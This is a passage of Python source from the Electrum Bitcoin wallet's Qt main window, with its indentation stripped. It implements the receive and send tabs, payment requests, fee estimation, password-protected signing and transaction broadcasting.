text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = QIcon(":icons/status_connected.png")
else:
icon = QIcon(":icons/status_connected_proxy.png")
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self):
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin address where the payment should be received. Note that each payment request uses a different Bitcoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
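    # Build a BIP21 payment URI for a stored request, appending the optional
    # 'time', 'exp', 'name' and base58-encoded 'sig' fields used by signed
    # (OpenAlias) requests. The result is roughly of the form (illustrative):
    #   bitcoin:<address>?amount=...&message=...&time=...&exp=...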
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
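    # If an OpenAlias is configured and resolves to an address belonging to
    # this wallet, sign the payment request with that address, asking for the
    # password when the keystore is encrypted.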
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
traceback.print_exc(file=sys.stderr)
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
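    # Create a new receiving request. If the wallet has run out of unused
    # addresses, either refuse (non-deterministic wallet) or warn that an
    # address created beyond the gap limit may not be recovered from seed.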
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
addr = self.wallet.get_receiving_address() or ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(addr, amount, message, uri)
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
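        # Callback for the fee slider: in dynamic mode it stores the selected
        # mempool depth or fee level, otherwise it stores a static fee_per_kb
        # and mirrors the value into the sat/byte feerate edit.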
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if not edit_changed.get_amount():
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(140)
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.'))
QMessageBox.information(self, 'Fee rounding', text)
self.feerounding_icon = QPushButton(QIcon(':icons/info.png'), '')
self.feerounding_icon.setFixedWidth(20)
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(t):
self.is_max = False
self.max_button.setEnabled(not bool(t))
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.is_max else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee_estimator = self.get_send_fee_estimator()
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
self.get_coins(), outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
traceback.print_exc(file=sys.stderr)
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.is_max:
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
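    # Returns what make_unsigned_transaction expects as fixed_fee: an absolute
    # fee in satoshis when the fee field is frozen, a callable estimator when
    # the feerate field is frozen, or None to fall back to the config's own
    # fee estimation.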
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
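    # Validate the Send tab and collect everything needed to build the
    # transaction; returns (outputs, fee_estimator, label, coins), or None on
    # error (expired request, invalid lines, bad address or amount).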
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for _type, addr, amount in outputs:
if addr is None:
self.show_error(_('Bitcoin Address is None'))
return
if _type == TYPE_ADDRESS and not bitcoin.is_address(addr):
self.show_error(_('Invalid Bitcoin Address'))
return
if amount is None:
self.show_error(_('Invalid Amount'))
return
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def do_preview(self):
self.do_send(preview = True)
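    # Build the unsigned transaction, opt in to RBF, sanity-check the fee
    # against the server relay fee, then either preview it or confirm
    # (asking for the password if needed), sign and broadcast it.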
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee_estimator, tx_desc, coins = r
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
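    # Broadcast in a background thread via a WaitingDialog. For BIP70 payment
    # requests the invoice is marked as paid and an ACK is sent to the
    # merchant; results are reported back on the GUI thread.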
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status, msg = self.network.broadcast_transaction(tx)
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
if ack_status:
msg = ack_msg
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
